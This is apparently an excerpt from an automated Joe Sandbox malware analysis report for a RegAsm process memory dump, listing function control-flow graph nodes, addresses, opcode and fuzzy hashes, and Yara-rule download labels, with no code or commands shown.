                                                                                      control_flow_graph 106 12132e7-1213310 108 1213312 106->108 109 1213317-121339f call 12135b1 call 121868c LdrInitializeThunk 106->109 108->109 113 12133a1 109->113 114 12133a6-12133ed 109->114 113->114 117 1213576-121357f 114->117 118 12133f2-12133fb 117->118 119 1213585-1213596 117->119 120 1213402-121342a 118->120 121 12133fd 118->121 124 1213431-1213454 120->124 125 121342c 120->125 121->120 127 1213456 124->127 128 121345b-1213472 124->128 125->124 127->128 130 1213480-1213486 128->130 131 1213474-121347e 128->131 132 1213489-1213496 130->132 131->132 133 1213498 132->133 134 121349d-12134aa 132->134 133->134 135 12134b1-1213573 134->135 136 12134ac 134->136 135->117 136->135
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.4120554570.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_1210000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 73d43d213a7228a5e398d3c04ddf95682ff25f34e0306c4b3534cf3609727e33
                                                                                      • Instruction ID: 16ace5a6933215d6fc7f86538044aa04c17becff9e5a0605e371bde52174a3ff
                                                                                      • Opcode Fuzzy Hash: 73d43d213a7228a5e398d3c04ddf95682ff25f34e0306c4b3534cf3609727e33
                                                                                      • Instruction Fuzzy Hash: 3F417275E012199BDB18CFAAD94499DFBF3BF88310F14C12AD818AB318EB349946CF51
                                                                                      Function 01212E1B Relevance: .3, Instructions: 269COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 343 1212e1b 406 1212e1b call 12132f0 343->406 407 1212e1b call 12132e7 343->407 344 1212e21-1212e36 345 121328a-1213293 344->345 346 1213299-12132c0 345->346 347 1212e3b-1212e44 345->347 348 1212e46 347->348 349 1212e4b-1212e7c 347->349 348->349 352 1212e83-1212eac 349->352 353 1212e7e 349->353 357 1212eb3-1212ee1 352->357 358 1212eae 352->358 353->352 360 1212ee3 357->360 361 1212ee8-1212f11 357->361 358->357 360->361 363 1212f13 361->363 364 1212f18-1212f49 361->364 363->364 366 1212f50-1212f79 364->366 367 1212f4b 364->367 369 1212f80-1212fb4 366->369 370 1212f7b 366->370 367->366 372 1212fb6 369->372 373 1212fbb-1213005 369->373 370->369 372->373 376 1213007 373->376 377 121300c-121303e 373->377 376->377 379 1213040 377->379 380 1213045-12130d3 377->380 379->380 382 12131a9-1213272 380->382 383 12130d9-12131a4 380->383 404 1213273-1213287 382->404 383->404 404->345 406->344 407->344
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.4120554570.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_1210000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 925d58c238a55d752a50437cd65d9c34fc37b6906a221e59eab68c389a10aeec
                                                                                      • Instruction ID: c9037c1a1c6f924e359229da0ab3152d964e9fac868d8e88dfdcfc0585aa6382
                                                                                      • Opcode Fuzzy Hash: 925d58c238a55d752a50437cd65d9c34fc37b6906a221e59eab68c389a10aeec
                                                                                      • Instruction Fuzzy Hash: B6D1AC74E01229CFDB64DFA8D984B9DBBB2BF48300F2081A9E409A7355DB30AD85CF55
                                                                                      Function 01211248 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.4120554570.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_1210000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d271234273b3a7ae30b12dc5ebfdb07e9952ac1356666230945931fd3ce361de
                                                                                      • Instruction ID: 250bc1d1729188c9f2c844e34bd4dc09c0ae934c137d7ee203210e023718bc32
                                                                                      • Opcode Fuzzy Hash: d271234273b3a7ae30b12dc5ebfdb07e9952ac1356666230945931fd3ce361de
                                                                                      • Instruction Fuzzy Hash: DF4144B4E012589FDB50CFA8D598BDDBBF0BB09314F20412AE818BB394D7B99949CF54

                                                                                      Non-executed Functions

                                                                                      Function 0121059C Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.4120554570.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_1210000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e95c0a4d868a45e144bb1dff3277bb17f0ba002d15029a8ca76fde6081718775
                                                                                      • Instruction ID: f52aaa51673cd646e9b94222416c31c118b3c976e36297186f807c9f98e27c0c
                                                                                      • Opcode Fuzzy Hash: e95c0a4d868a45e144bb1dff3277bb17f0ba002d15029a8ca76fde6081718775
                                                                                      • Instruction Fuzzy Hash: CE31CCB5D04258DFCB10CFA9D584AEEFBF4EB09310F24906AE414B7214D774A989CF68
                                                                                      Function 01210CE0 Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.4120554570.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_1210000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 994c4389b120957dc51aa25afd195ec888ac63478784eebec63fc4adc6b6c9b2
                                                                                      • Instruction ID: 75ced642f3744a7527c4533864006bfc1f74f4f80689ba9bcf7f2bdcb1ff486e
                                                                                      • Opcode Fuzzy Hash: 994c4389b120957dc51aa25afd195ec888ac63478784eebec63fc4adc6b6c9b2
                                                                                      • Instruction Fuzzy Hash: 1731DDB5D05258DFCB00CFA9D484AEEFBF4AF49310F24906AE454B7214D774A989CF68